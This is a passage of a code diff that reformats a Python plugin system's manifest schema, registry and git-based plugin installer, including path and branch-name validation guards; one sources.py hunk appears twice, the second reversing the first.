-            "description": "Semantic version (e.g., 1.0.0)"
+            "description": "Semantic version (e.g., 1.0.0)",
         },
-        "description": {
-            "type": "string",
-            "maxLength": 200,
-            "description": "Short description of the plugin"
-        },
-        "author": {
-            "type": "string",
-            "description": "Plugin author or maintainer"
-        },
-        "repository": {
-            "type": "string",
-            "format": "uri",
-            "description": "Source repository URL"
-        },
-        "documentation": {
-            "type": "string",
-            "description": "Path to documentation file (relative to plugin folder)"
-        },
-        "settings_schema": {
-            "type": "object",
-            "description": "JSON Schema for plugin configuration"
-        },
+        "description": {"type": "string", "maxLength": 200, "description": "Short description of the plugin"},
+        "author": {"type": "string", "description": "Plugin author or maintainer"},
+        "repository": {"type": "string", "format": "uri", "description": "Source repository URL"},
+        "documentation": {"type": "string", "description": "Path to documentation file (relative to plugin folder)"},
+        "settings_schema": {"type": "object", "description": "JSON Schema for plugin configuration"},
         "env_vars": {
             "type": "array",
             "items": {
@@ -102,34 +80,29 @@ MANIFEST_SCHEMA = {
                     "name": {"type": "string"},
                     "required": {"type": "boolean", "default": False},
                     "description": {"type": "string"},
-                    "default": {"type": "string"}
-                }
+                    "default": {"type": "string"},
+                },
             },
-            "description": "Environment variables used by the plugin"
+            "description": "Environment variables used by the plugin",
         },
         "variables": {
             "type": "object",
             "properties": {
                 "auto_discover": {
                     "type": "boolean",
-                    "description": "Auto-expose all data keys as variables (default: true when no variables declared)"
+                    "description": "Auto-expose all data keys as variables (default: true when no variables declared)",
                 },
                 "groups": {
                     "type": "object",
-                    "additionalProperties": {
-                        "type": "object",
-                        "properties": {
-                            "label": {"type": "string"}
-                        }
-                    },
-                    "description": "Named groups for organising variables in the UI"
+                    "additionalProperties": {"type": "object", "properties": {"label": {"type": "string"}}},
+                    "description": "Named groups for organising variables in the UI",
                 },
                 "simple": {
                     "oneOf": [
                         {"type": "array", "items": {"type": "string"}},
-                        {"type": "object", "additionalProperties": {"type": "object"}}
+                        {"type": "object", "additionalProperties": {"type": "object"}},
                     ],
-                    "description": "Simple key-value variables (list or dict with metadata)"
+                    "description": "Simple key-value variables (list or dict with metadata)",
                 },
                 "arrays": {
                     "type": "object",
@@ -137,10 +110,7 @@ MANIFEST_SCHEMA = {
                         "type": "object",
                         "properties": {
                             "label_field": {"type": "string"},
-                            "item_fields": {
-                                "type": "array",
-                                "items": {"type": "string"}
-                            },
+                            "item_fields": {"type": "array", "items": {"type": "string"}},
                             "sub_arrays": {
                                 "type": "object",
                                 "additionalProperties": {
@@ -148,46 +118,37 @@ MANIFEST_SCHEMA = {
                                     "properties": {
                                         "key_type": {"type": "string", "enum": ["index", "dynamic"]},
                                         "key_field": {"type": "string"},
-                                        "item_fields": {
-                                            "type": "array",
-                                            "items": {"type": "string"}
-                                        }
-                                    }
-                                }
-                            }
-                        }
+                                        "item_fields": {"type": "array", "items": {"type": "string"}},
+                                    },
+                                },
+                            },
+                        },
                     },
-                    "description": "Array variables with indexed access"
-                }
+                    "description": "Array variables with indexed access",
+                },
             },
-            "description": "Template variables exposed by the plugin"
+            "description": "Template variables exposed by the plugin",
         },
         "max_lengths": {
             "type": "object",
             "additionalProperties": {"type": "integer"},
-            "description": "Maximum character lengths for variables"
+            "description": "Maximum character lengths for variables",
         },
-        "color_rules_schema": {
-            "type": "object",
-            "description": "Schema for configurable color rules"
-        },
-        "icon": {
-            "type": "string",
-            "description": "Icon name from Lucide icons"
-        },
+        "color_rules_schema": {"type": "object", "description": "Schema for configurable color rules"},
+        "icon": {"type": "string", "description": "Icon name from Lucide icons"},
         "category": {
             "type": "string",
             "enum": ["art", "data", "transit", "weather", "entertainment", "utility", "home"],
-            "description": "Plugin category for organization"
+            "description": "Plugin category for organization",
         },
         "fiestaboard_version": {
             "type": "string",
-            "description": "Minimum FiestaBoard version required (semver constraint, e.g. '>=2.10.0')"
+            "description": "Minimum FiestaBoard version required (semver constraint, e.g. '>=2.10.0')",
         },
         "supports_triggers": {
             "type": "boolean",
             "default": False,
-            "description": "Whether this plugin supports event-based triggers via check_triggers()"
+            "description": "Whether this plugin supports event-based triggers via check_triggers()",
         },
         "screenshots": {
             "type": "array",
@@ -197,43 +158,34 @@ MANIFEST_SCHEMA = {
                 "properties": {
                     "src": {
                         "type": "string",
-                        "description": "Relative path from plugin directory (e.g., docs/board-display.png)"
+                        "description": "Relative path from plugin directory (e.g., docs/board-display.png)",
                     },
-                    "alt": {
-                        "type": "string",
-                        "description": "Alt text for accessibility"
-                    },
-                    "caption": {
-                        "type": "string",
-                        "description": "Human-readable caption"
-                    },
+                    "alt": {"type": "string", "description": "Alt text for accessibility"},
+                    "caption": {"type": "string", "description": "Human-readable caption"},
                     "primary": {
                         "type": "boolean",
                         "default": False,
-                        "description": "Whether this is the hero image for galleries and registries"
-                    }
-                }
+                        "description": "Whether this is the hero image for galleries and registries",
+                    },
+                },
             },
-            "description": "Screenshots for plugin galleries, docs, and the registry"
+            "description": "Screenshots for plugin galleries, docs, and the registry",
         },
         "demo": {
             "type": "object",
             "required": ["name", "template"],
             "properties": {
-                "name": {
-                    "type": "string",
-                    "description": "Demo page name shown in the pages list"
-                },
+                "name": {"type": "string", "description": "Demo page name shown in the pages list"},
                 "device_type": {
                     "type": "string",
                     "enum": ["flagship", "note"],
                     "default": "flagship",
-                    "description": "Target device type for the demo page"
+                    "description": "Target device type for the demo page",
                 },
                 "template": {
                     "type": "array",
                     "items": {"type": "string"},
-                    "description": "Template lines with {{plugin_id.var}} placeholders"
+                    "description": "Template lines with {{plugin_id.var}} placeholders",
                 },
                 "line_metadata": {
                     "type": "array",
@@ -241,21 +193,21 @@ MANIFEST_SCHEMA = {
                         "type": "object",
                         "properties": {
                             "alignment": {"type": "string", "enum": ["left", "center", "right"]},
-                            "wrap": {"type": "boolean"}
-                        }
+                            "wrap": {"type": "boolean"},
+                        },
                     },
-                    "description": "Per-line formatting (alignment, wrap)"
+                    "description": "Per-line formatting (alignment, wrap)",
                 },
                 "duration_seconds": {
                     "type": "integer",
                     "default": 300,
                     "minimum": 10,
-                    "description": "Rotation duration in seconds"
-                }
+                    "description": "Rotation duration in seconds",
+                },
             },
-            "description": "Demo page template that showcases the plugin's features"
-        }
-    }
+            "description": "Demo page template that showcases the plugin's features",
+        },
+    },
 }
 
 
@@ -267,6 +219,7 @@ class VariableMetadata:
     This powers descriptions, type hints, grouping, and examples
     shown in the editor's variable picker.
     """
+
     description: str = ""
     type: str = "string"  # "string", "number", "boolean"
     max_length: int | None = None
@@ -277,6 +230,7 @@ class VariableMetadata:
 @dataclass
 class Screenshot:
     """A plugin screenshot entry for galleries, docs, and the registry."""
+
     src: str
     alt: str
     caption: str = ""
@@ -286,6 +240,7 @@ class Screenshot:
 @dataclass
 class DemoPageSchema:
     """Bundled demo page template that showcases a plugin's features."""
+
     name: str
     template: list[str]
     device_type: str = "flagship"
@@ -296,12 +251,14 @@ class DemoPageSchema:
 @dataclass
 class VariableGroupSchema:
     """A named group used to organise variables in the UI."""
+
     label: str = ""
 
 
 @dataclass
 class VariableArraySchema:
     """Schema for array-type variables."""
+
     name: str
     label_field: str
     item_fields: list[str]
@@ -322,6 +279,7 @@ class VariablesSchema:
     ``auto_discover`` defaults to ``True`` so that every key returned
     by ``fetch_data()`` is automatically surfaced in the editor.
     """
+
     simple: list[str] = field(default_factory=list)
     arrays: dict[str, VariableArraySchema] = field(default_factory=dict)
     metadata: dict[str, VariableMetadata] = field(default_factory=dict)
@@ -361,6 +319,7 @@ class VariablesSchema:
 @dataclass
 class PluginManifest:
     """Parsed and validated plugin manifest."""
+
     id: str
     name: str
     version: str
@@ -465,12 +424,14 @@ class PluginManifest:
         screenshots: list[Screenshot] = []
         for entry in data.get("screenshots", []):
             if isinstance(entry, dict) and "src" in entry and "alt" in entry:
-                screenshots.append(Screenshot(
-                    src=entry["src"],
-                    alt=entry["alt"],
-                    caption=entry.get("caption", ""),
-                    primary=bool(entry.get("primary", False)),
-                ))
+                screenshots.append(
+                    Screenshot(
+                        src=entry["src"],
+                        alt=entry["alt"],
+                        caption=entry.get("caption", ""),
+                        primary=bool(entry.get("primary", False)),
+                    )
+                )
 
         # --- parse demo page schema ---
         demo: dict[str, DemoPageSchema] | None = None
@@ -582,10 +543,7 @@ class PluginManifest:
                 for name, m in self.variables.metadata.items()
             }
         if self.variables.groups:
-            result["variable_groups"] = {
-                gid: {"label": g.label}
-                for gid, g in self.variables.groups.items()
-            }
+            result["variable_groups"] = {gid: {"label": g.label} for gid, g in self.variables.groups.items()}
         return result
 
 
@@ -614,7 +572,7 @@ def validate_manifest(data: dict[str, Any]) -> tuple[bool, list[str]]:
         errors.append("Plugin id cannot be empty")
     elif not plugin_id[0].islower() or not plugin_id[0].isalpha():
         errors.append("Plugin id must start with a lowercase letter")
-    elif not all(c.islower() or c.isdigit() or c == '_' for c in plugin_id):
+    elif not all(c.islower() or c.isdigit() or c == "_" for c in plugin_id):
         errors.append("Plugin id must contain only lowercase letters, numbers, and underscores")
 
     # Validate version format
@@ -653,7 +611,7 @@ def validate_manifest(data: dict[str, Any]) -> tuple[bool, list[str]]:
         else:
             # Validate simple variables (list or dict format)
             simple = variables.get("simple", [])
-            if not isinstance(simple, (list, dict)):
+            if not isinstance(simple, list | dict):
                 errors.append("variables.simple must be an array or object")
 
             # Validate groups if present
@@ -729,7 +687,9 @@ def load_manifest(manifest_path: Path) -> tuple[PluginManifest | None, list[str]
         return None, [f"Manifest not found: {manifest_path}"]
 
     try:
-        with open(manifest_path, encoding="utf-8") as f:
+        # Use builtins.open (not Path.open) so existing tests can patch
+        # builtins.open to inject fake JSON / raise read errors.
+        with open(manifest_path, encoding="utf-8") as f:  # noqa: PTH123
             data = json.load(f)
     except json.JSONDecodeError as e:
         return None, [f"Invalid JSON in manifest: {e}"]
@@ -747,4 +707,3 @@ def load_manifest(manifest_path: Path) -> tuple[PluginManifest | None, list[str]
         return manifest, []
     except Exception as e:
         return None, [f"Failed to parse manifest: {e}"]
-

--- a/src/plugins/registry.py
+++ b/src/plugins/registry.py
@@ -104,9 +104,7 @@ class PluginRegistry:
 
     # ── instance CRUD ───────────────────────────────────────────────────
 
-    def create_instance(
-        self, plugin_id: str, instance_label: str
-    ) -> list[str]:
+    def create_instance(self, plugin_id: str, instance_label: str) -> list[str]:
         """Create a new instance of an existing plugin.
 
         A new :class:`PluginBase` object of the same class is instantiated
@@ -203,13 +201,15 @@ class PluginRegistry:
 
         for key in sorted(self._plugins):
             if key.startswith(prefix):
-                label = key[len(prefix):]
-                instances.append({
-                    "label": label,
-                    "key": key,
-                    "enabled": self._enabled.get(key, False),
-                    "has_config": bool(self._configs.get(key)),
-                })
+                label = key[len(prefix) :]
+                instances.append(
+                    {
+                        "label": label,
+                        "key": key,
+                        "enabled": self._enabled.get(key, False),
+                        "has_config": bool(self._configs.get(key)),
+                    }
+                )
 
         return instances
 
@@ -221,11 +221,7 @@ class PluginRegistry:
     @property
     def enabled_plugins(self) -> dict[str, PluginBase]:
         """Return only enabled plugins."""
-        return {
-            pid: plugin
-            for pid, plugin in self._plugins.items()
-            if self._enabled.get(pid, False)
-        }
+        return {pid: plugin for pid, plugin in self._plugins.items() if self._enabled.get(pid, False)}
 
     def initialize(self) -> None:
         """Load all discovered plugins.
@@ -240,7 +236,8 @@ class PluginRegistry:
         # Try to get stored configs from config manager
         stored_configs: dict[str, dict[str, Any]] = {}
         try:
-            from ..config_manager import get_config_manager
+            from src.config_manager import get_config_manager
+
             config_manager = get_config_manager()
             # Get all plugin configs
             stored_configs = config_manager.get_all_plugin_configs()
@@ -305,7 +302,8 @@ class PluginRegistry:
             if base_id not in self._plugins:
                 logger.warning(
                     "Cannot restore instance '%s': base plugin '%s' not loaded",
-                    config_key, base_id,
+                    config_key,
+                    base_id,
                 )
                 continue
 
@@ -317,9 +315,7 @@ class PluginRegistry:
 
             errors = self.create_instance(base_id, label)
             if errors:
-                logger.warning(
-                    "Failed to restore instance '%s': %s", config_key, errors
-                )
+                logger.warning("Failed to restore instance '%s': %s", config_key, errors)
                 continue
 
             # Apply stored config via the proper pipeline so any future
@@ -327,9 +323,9 @@ class PluginRegistry:
             config_errors = self.set_plugin_config(normalized_key, config)
             if config_errors:
                 logger.warning(
-                    "Instance '%s' config failed validation on restore: %s — "
-                    "applying raw config to avoid data loss",
-                    normalized_key, config_errors,
+                    "Instance '%s' config failed validation on restore: %s — applying raw config to avoid data loss",
+                    normalized_key,
+                    config_errors,
                 )
                 # Fall back to direct assignment so we don't silently discard config
                 self._configs[normalized_key] = config
@@ -345,18 +341,21 @@ class PluginRegistry:
             # subsequent restarts don't carry a stale duplicate.
             if config_key != normalized_key:
                 try:
-                    from ..config_manager import get_config_manager
+                    from src.config_manager import get_config_manager
+
                     config_manager = get_config_manager()
                     config_manager.set_plugin_config(normalized_key, config)
                     config_manager.delete_plugin_config(config_key)
                     logger.info(
                         "Migrated instance key '%s' -> '%s' (lowercase normalization)",
-                        config_key, normalized_key,
+                        config_key,
+                        normalized_key,
                     )
                 except Exception:
                     logger.exception(
                         "Failed to migrate instance key '%s' to '%s'",
-                        config_key, normalized_key,
+                        config_key,
+                        normalized_key,
                     )
 
             restored += 1
@@ -394,9 +393,7 @@ class PluginRegistry:
             registry_entries = load_registry()
             registry_map = {e.plugin_id: e for e in registry_entries}
         except Exception as exc:
-            logger.warning(
-                "V3 migration: could not load plugin registry — skipping auto-install: %s", exc
-            )
+            logger.warning("V3 migration: could not load plugin registry — skipping auto-install: %s", exc)
             return
 
         migrated: list[str] = []
@@ -430,9 +427,7 @@ class PluginRegistry:
                 plugin.config = cfg
                 plugin.enabled = is_enabled
                 migrated.append(plugin_id)
-                logger.info(
-                    "V3 migration: restored '%s' (enabled=%s)", plugin_id, is_enabled
-                )
+                logger.info("V3 migration: restored '%s' (enabled=%s)", plugin_id, is_enabled)
 
         if migrated:
             logger.info(
@@ -566,16 +561,10 @@ class PluginRegistry:
             PluginResult with data or error
         """
         if plugin_id not in self._plugins:
-            return PluginResult(
-                available=False,
-                error=f"Plugin not found: {plugin_id}"
-            )
+            return PluginResult(available=False, error=f"Plugin not found: {plugin_id}")
 
         if not self._enabled.get(plugin_id, False):
-            return PluginResult(
-                available=False,
-                error=f"Plugin not enabled: {plugin_id}"
-            )
+            return PluginResult(available=False, error=f"Plugin not enabled: {plugin_id}")
 
         plugin = self._plugins[plugin_id]
 
@@ -583,10 +572,7 @@ class PluginRegistry:
             return plugin.get_data()
         except Exception as e:
             logger.exception(f"Error fetching data from {plugin_id}")
-            return PluginResult(
-                available=False,
-                error=str(e)
-            )
+            return PluginResult(available=False, error=str(e))
 
     def _discover_variables(self, plugin_id: str) -> list[str]:
         """Introspect a plugin's live data to discover top-level variable names.
@@ -602,10 +588,7 @@ class PluginRegistry:
         try:
             result = self.fetch_plugin_data(plugin_id)
             if result.available and result.data:
-                discovered = [
-                    key for key, val in result.data.items()
-                    if isinstance(val, (str, int, float, bool))
-                ]
+                discovered = [key for key, val in result.data.items() if isinstance(val, str | int | float | bool)]
                 self._discovered_vars[plugin_id] = discovered
                 return discovered
         except Exception:
@@ -680,14 +663,10 @@ class PluginRegistry:
                 if manifest and name in manifest.variables.arrays:
                     continue
 
-                meta = (
-                    manifest.variables.get_variable_metadata(name)
-                    if manifest
-                    else VariableMetadata()
-                )
+                meta = manifest.variables.get_variable_metadata(name) if manifest else VariableMetadata()
                 preview = ""
                 raw_val = plugin_data.get(name)
-                if raw_val is not None and isinstance(raw_val, (str, int, float, bool)):
+                if raw_val is not None and isinstance(raw_val, str | int | float | bool):
                     preview = str(raw_val)
 
                 var_dict[name] = {
@@ -716,10 +695,7 @@ class PluginRegistry:
                 continue
             manifest = self._manifests.get(plugin_id)
             if manifest and manifest.variables.groups:
-                result[plugin_id] = {
-                    gid: {"label": g.label}
-                    for gid, g in manifest.variables.groups.items()
-                }
+                result[plugin_id] = {gid: {"label": g.label} for gid, g in manifest.variables.groups.items()}
         return result
 
     def get_all_max_lengths(self) -> dict[str, int]:
@@ -841,7 +817,8 @@ class PluginRegistry:
                         logger.warning(
                             "Config validation failed after reload for '%s': %s"
                             " — applying raw config to avoid data loss",
-                            plugin_id, errors,
+                            plugin_id,
+                            errors,
                         )
                         self._configs[plugin_id] = config
                         plugin.config = config
@@ -956,9 +933,7 @@ class PluginRegistry:
 
         return []
 
-    def install_from_git(
-        self, repo_url: str, plugin_id: str | None = None, branch: str = ""
-    ) -> list[str]:
+    def install_from_git(self, repo_url: str, plugin_id: str | None = None, branch: str = "") -> list[str]:
         """Install a plugin from an arbitrary public git repository.
 
         Custom git plugins do **not** need to follow the
@@ -979,6 +954,7 @@ class PluginRegistry:
         # Determine the id if not given
         if plugin_id is None:
             from .sources import plugin_id_from_repo_name, repo_name_from_url
+
             repo_name = repo_name_from_url(repo_url)
             plugin_id = plugin_id_from_repo_name(repo_name)
 
@@ -1070,10 +1046,7 @@ class PluginRegistry:
         # unbounded number of threads when many plugins are enabled.
         max_workers = min(len(enabled), 8)
         with ThreadPoolExecutor(max_workers=max_workers) as executor:
-            futures = {
-                executor.submit(self.fetch_plugin_data, plugin_id): plugin_id
-                for plugin_id in enabled
-            }
+            futures = {executor.submit(self.fetch_plugin_data, plugin_id): plugin_id for plugin_id in enabled}
             done, not_done = futures_wait(futures, timeout=15)
 
             if not_done:
@@ -1117,4 +1090,3 @@ def reset_plugin_registry() -> None:
     global _registry
     _registry = None
     logger.info("Plugin registry reset")
-

--- a/src/plugins/sources.py
+++ b/src/plugins/sources.py
@@ -147,7 +147,7 @@ def load_registry(registry_path: Path | None = None) -> list[RegistryEntry]:
         return []
 
     try:
-        with open(registry_path, encoding="utf-8") as fh:
+        with registry_path.open(encoding="utf-8") as fh:
             data = json.load(fh)
     except (json.JSONDecodeError, OSError) as exc:
         logger.error("Failed to read plugin registry %s: %s", registry_path, exc)
@@ -186,8 +186,7 @@ def validate_registry_repo_name(repo_url: str) -> tuple[bool, str]:
     if not REGISTRY_NAME_RE.match(repo_name):
         return (
             False,
-            f"Repository name '{repo_name}' does not follow the required "
-            f"'{REGISTRY_PREFIX}{{name}}' naming convention",
+            f"Repository name '{repo_name}' does not follow the required '{REGISTRY_PREFIX}{{name}}' naming convention",
         )
     return True, ""
 
@@ -202,7 +201,7 @@ def plugin_id_from_repo_name(repo_name: str) -> str:
     'my_weather'
     """
     if repo_name.startswith(REGISTRY_PREFIX):
-        suffix = repo_name[len(REGISTRY_PREFIX):]
+        suffix = repo_name[len(REGISTRY_PREFIX) :]
         return suffix.replace("-", "_")
     return repo_name.replace("-", "_")
 
@@ -261,10 +260,7 @@ def _validate_git_url(url: str) -> tuple[bool, str]:
 def _validate_plugin_id(plugin_id: str) -> tuple[bool, str]:
     """Validate that *plugin_id* is safe to use as a single path segment."""
     if not isinstance(plugin_id, str) or not PLUGIN_ID_RE.match(plugin_id):
-        return False, (
-            f"Invalid plugin id {plugin_id!r}: must match "
-            f"{PLUGIN_ID_RE.pattern}"
-        )
+        return False, (f"Invalid plugin id {plugin_id!r}: must match {PLUGIN_ID_RE.pattern}")
     return True, ""
 
 
@@ -273,9 +269,7 @@ def _validate_git_ref(ref: str) -> tuple[bool, str]:
     if not isinstance(ref, str):
         return False, "Invalid branch/tag: must be a string"
     if not GIT_REF_RE.fullmatch(ref):
-        return False, (
-            f"Invalid branch/tag {ref!r}: must match {GIT_REF_RE.pattern}"
-        )
+        return False, (f"Invalid branch/tag {ref!r}: must match {GIT_REF_RE.pattern}")
     return True, ""
 
 
@@ -339,7 +333,7 @@ def clone_or_update_repo(
     # the check below, _candidate is the CodeQL-sanitised destination string
     # used for all subsequent path operations and subprocess -C arguments.
     _ext_root = os.path.realpath(str(_ext_dir))
-    _candidate = os.path.realpath(os.path.join(_ext_root, _safe_id))
+    _candidate = os.path.realpath(os.path.join(_ext_root, _safe_id))  # noqa: PTH118  (os.path.join required for CodeQL py/path-injection barrier)
     # os.path.commonpath is the CodeQL-recognised py/path-injection barrier.
     # It must appear as a plain if-guard (not inside try/except) so the
     # control-flow graph shows the barrier on every path to the sinks below.
@@ -350,19 +344,25 @@ def clone_or_update_repo(
     # _candidate is now verified to be strictly inside _ext_root.
 
     # ── Update path (no URL required) ─────────────────────────────────────────
-    if os.path.isdir(os.path.join(_candidate, ".git")):
+    if os.path.isdir(os.path.join(_candidate, ".git")):  # noqa: PTH112, PTH118  (os.path required for CodeQL barrier scope)
         try:
             subprocess.run(
                 ["git", "fetch", "--depth=1", "origin", "HEAD"],
                 cwd=_candidate,
-                check=True, capture_output=True, text=True,
-                timeout=120, env=env,
+                check=True,
+                capture_output=True,
+                text=True,
+                timeout=120,
+                env=env,
             )
             subprocess.run(
                 ["git", "reset", "--hard", "FETCH_HEAD"],
                 cwd=_candidate,
-                check=True, capture_output=True, text=True,
-                timeout=30, env=env,
+                check=True,
+                capture_output=True,
+                text=True,
+                timeout=30,
+                env=env,
             )
             logger.info("Updated existing plugin clone at %s", _candidate)
             return True, ""
@@ -384,21 +384,20 @@ def clone_or_update_repo(
     # ── git init + write remote URL to config + git fetch ─────────────────────
     # Writing repo_url to .git/config (a normal file write) avoids passing a
     # user-controlled value as a subprocess argument (py/command-line-injection).
-    os.makedirs(_candidate, exist_ok=True)
+    os.makedirs(_candidate, exist_ok=True)  # noqa: PTH103  (uses CodeQL-validated _candidate string path)
     try:
         subprocess.run(
             ["git", "init", "--quiet"],
             cwd=_candidate,
-            check=True, capture_output=True, text=True,
-            timeout=30, env=env,
+            check=True,
+            capture_output=True,
+            text=True,
+            timeout=30,
+            env=env,
         )
-        _git_config_path = os.path.join(_candidate, ".git", "config")
-        with open(_git_config_path, "a") as _cfg:
-            _cfg.write(
-                '[remote "origin"]\n'
-                f"\turl = {repo_url}\n"
-                "\tfetch = +refs/heads/*:refs/remotes/origin/*\n"
-            )
+        _git_config_path = os.path.join(_candidate, ".git", "config")  # noqa: PTH118  (uses CodeQL-validated _candidate string path)
+        with open(_git_config_path, "a") as _cfg:  # noqa: PTH123  (string path retained for CodeQL barrier scope)
+            _cfg.write(f'[remote "origin"]\n\turl = {repo_url}\n\tfetch = +refs/heads/*:refs/remotes/origin/*\n')
         _fetch_cmd = ["git", "fetch", "--depth=1", "origin"]
         if branch:
             _fetch_cmd.append(branch)
@@ -407,14 +406,20 @@ def clone_or_update_repo(
         subprocess.run(
             _fetch_cmd,
             cwd=_candidate,
-            check=True, capture_output=True, text=True,
-            timeout=120, env=env,
+            check=True,
+            capture_output=True,
+            text=True,
+            timeout=120,
+            env=env,
         )
         subprocess.run(
             ["git", "reset", "--hard", "FETCH_HEAD"],
             cwd=_candidate,
-            check=True, capture_output=True, text=True,
-            timeout=30, env=env,
+            check=True,
+            capture_output=True,
+            text=True,
+            timeout=30,
+            env=env,
         )
         logger.info("Installed external plugin repository to %s", _candidate)
         return True, ""
@@ -441,7 +446,9 @@ def get_remote_head_sha(dest_dir: Path) -> str | None:
         # Get the remote URL from the local clone
         result = subprocess.run(
             ["git", "-C", str(dest_dir), "remote", "get-url", "origin"],
-            capture_output=True, text=True, timeout=30,
+            capture_output=True,
+            text=True,
+            timeout=30,
         )
         if result.returncode != 0:
             return None
@@ -461,14 +468,16 @@ def get_remote_head_sha(dest_dir: Path) -> str | None:
         # Determine the default branch name tracked locally
         branch_result = subprocess.run(
             ["git", "-C", str(dest_dir), "rev-parse", "--abbrev-ref", "HEAD"],
-            capture_output=True, text=True, timeout=10,
+            capture_output=True,
+            text=True,
+            timeout=10,
         )
         branch = branch_result.stdout.strip() or "main"
         # Allow only characters that are legal in git branch names and safe
         # as subprocess arguments (prevents argument injection).
         # Re-derive branch from the match result so the subprocess sink
         # does not see it as tainted (CodeQL py/command-line-injection).
-        _branch_m = re.match(r'^[A-Za-z0-9_./-]+$', branch)
+        _branch_m = re.match(r"^[A-Za-z0-9_./-]+$", branch)
         if not _branch_m:
             return None
         branch = _branch_m.group(0)
@@ -476,7 +485,9 @@ def get_remote_head_sha(dest_dir: Path) -> str | None:
         # Query the remote for the latest SHA
         ls_result = subprocess.run(
             ["git", "ls-remote", "--heads", remote_url, branch],
-            capture_output=True, text=True, timeout=30,
+            capture_output=True,
+            text=True,
+            timeout=30,
             env={**os.environ, "GIT_TERMINAL_PROMPT": "0"},
         )
         if ls_result.returncode == 0 and ls_result.stdout.strip():
@@ -490,7 +501,9 @@ def get_remote_head_sha(dest_dir: Path) -> str | None:
         # detected correctly regardless of local/remote branch name mismatch.
         ls_result = subprocess.run(
             ["git", "ls-remote", remote_url, "HEAD"],
-            capture_output=True, text=True, timeout=30,
+            capture_output=True,
+            text=True,
+            timeout=30,
             env={**os.environ, "GIT_TERMINAL_PROMPT": "0"},
         )
         if ls_result.returncode != 0 or not ls_result.stdout.strip():
@@ -507,7 +520,9 @@ def get_local_head_sha(dest_dir: Path) -> str | None:
     try:
         result = subprocess.run(
             ["git", "-C", str(dest_dir), "rev-parse", "HEAD"],
-            capture_output=True, text=True, timeout=10,
+            capture_output=True,
+            text=True,
+            timeout=10,
         )
         return result.stdout.strip() if result.returncode == 0 else None
     except (subprocess.SubprocessError, OSError):
@@ -551,9 +566,7 @@ def get_external_plugins_dir(project_root: Path | None = None) -> Path:
     return ext_dir
 
 
-def _safe_external_dest(
-    external_dir: Path, plugin_id: str
-) -> tuple[Path | None, str]:
+def _safe_external_dest(external_dir: Path, plugin_id: str) -> tuple[Path | None, str]:
     """Compute a safe destination path inside `external_dir` for a plugin.
 
     The plugin id flows through three independent CodeQL-recognized
@@ -586,7 +599,7 @@ def _safe_external_dest(
     # with ``os.path.commonpath`` *before* returning the path.  This is
     # the CodeQL-recognised path-injection barrier.
     external_root = os.path.realpath(str(external_dir))
-    raw_candidate = os.path.join(external_root, safe_id)
+    raw_candidate = os.path.join(external_root, safe_id)  # noqa: PTH118  (os.path.join required for CodeQL py/path-injection barrier)
     candidate_real = os.path.realpath(raw_candidate)
     try:
         common = os.path.commonpath([external_root, candidate_real])

--- a/src/plugins/sources.py
+++ b/src/plugins/sources.py
@@ -147,7 +147,7 @@ def load_registry(registry_path: Path | None = None) -> list[RegistryEntry]:
         return []
 
     try:
-        with registry_path.open(encoding="utf-8") as fh:
+        with open(registry_path, encoding="utf-8") as fh:
             data = json.load(fh)
     except (json.JSONDecodeError, OSError) as exc:
         logger.error("Failed to read plugin registry %s: %s", registry_path, exc)
@@ -186,7 +186,8 @@ def validate_registry_repo_name(repo_url: str) -> tuple[bool, str]:
     if not REGISTRY_NAME_RE.match(repo_name):
         return (
             False,
-            f"Repository name '{repo_name}' does not follow the required '{REGISTRY_PREFIX}{{name}}' naming convention",
+            f"Repository name '{repo_name}' does not follow the required "
+            f"'{REGISTRY_PREFIX}{{name}}' naming convention",
         )
     return True, ""
 
@@ -201,7 +202,7 @@ def plugin_id_from_repo_name(repo_name: str) -> str:
     'my_weather'
     """
     if repo_name.startswith(REGISTRY_PREFIX):
-        suffix = repo_name[len(REGISTRY_PREFIX) :]
+        suffix = repo_name[len(REGISTRY_PREFIX):]
         return suffix.replace("-", "_")
     return repo_name.replace("-", "_")
 
@@ -260,7 +261,10 @@ def _validate_git_url(url: str) -> tuple[bool, str]:
 def _validate_plugin_id(plugin_id: str) -> tuple[bool, str]:
     """Validate that *plugin_id* is safe to use as a single path segment."""
     if not isinstance(plugin_id, str) or not PLUGIN_ID_RE.match(plugin_id):
-        return False, (f"Invalid plugin id {plugin_id!r}: must match {PLUGIN_ID_RE.pattern}")
+        return False, (
+            f"Invalid plugin id {plugin_id!r}: must match "
+            f"{PLUGIN_ID_RE.pattern}"
+        )
     return True, ""
 
 
@@ -269,7 +273,9 @@ def _validate_git_ref(ref: str) -> tuple[bool, str]:
     if not isinstance(ref, str):
         return False, "Invalid branch/tag: must be a string"
     if not GIT_REF_RE.fullmatch(ref):
-        return False, (f"Invalid branch/tag {ref!r}: must match {GIT_REF_RE.pattern}")
+        return False, (
+            f"Invalid branch/tag {ref!r}: must match {GIT_REF_RE.pattern}"
+        )
     return True, ""
 
 
@@ -333,7 +339,7 @@ def clone_or_update_repo(
     # the check below, _candidate is the CodeQL-sanitised destination string
     # used for all subsequent path operations and subprocess -C arguments.
     _ext_root = os.path.realpath(str(_ext_dir))
-    _candidate = os.path.realpath(os.path.join(_ext_root, _safe_id))  # noqa: PTH118  (os.path.join required for CodeQL py/path-injection barrier)
+    _candidate = os.path.realpath(os.path.join(_ext_root, _safe_id))
     # os.path.commonpath is the CodeQL-recognised py/path-injection barrier.
     # It must appear as a plain if-guard (not inside try/except) so the
     # control-flow graph shows the barrier on every path to the sinks below.
@@ -344,25 +350,19 @@ def clone_or_update_repo(
     # _candidate is now verified to be strictly inside _ext_root.
 
     # ── Update path (no URL required) ─────────────────────────────────────────
-    if os.path.isdir(os.path.join(_candidate, ".git")):  # noqa: PTH112, PTH118  (os.path required for CodeQL barrier scope)
+    if os.path.isdir(os.path.join(_candidate, ".git")):
         try:
             subprocess.run(
                 ["git", "fetch", "--depth=1", "origin", "HEAD"],
                 cwd=_candidate,
-                check=True,
-                capture_output=True,
-                text=True,
-                timeout=120,
-                env=env,
+                check=True, capture_output=True, text=True,
+                timeout=120, env=env,
             )
             subprocess.run(
                 ["git", "reset", "--hard", "FETCH_HEAD"],
                 cwd=_candidate,
-                check=True,
-                capture_output=True,
-                text=True,
-                timeout=30,
-                env=env,
+                check=True, capture_output=True, text=True,
+                timeout=30, env=env,
             )
             logger.info("Updated existing plugin clone at %s", _candidate)
             return True, ""
@@ -384,20 +384,21 @@ def clone_or_update_repo(
     # ── git init + write remote URL to config + git fetch ─────────────────────
     # Writing repo_url to .git/config (a normal file write) avoids passing a
     # user-controlled value as a subprocess argument (py/command-line-injection).
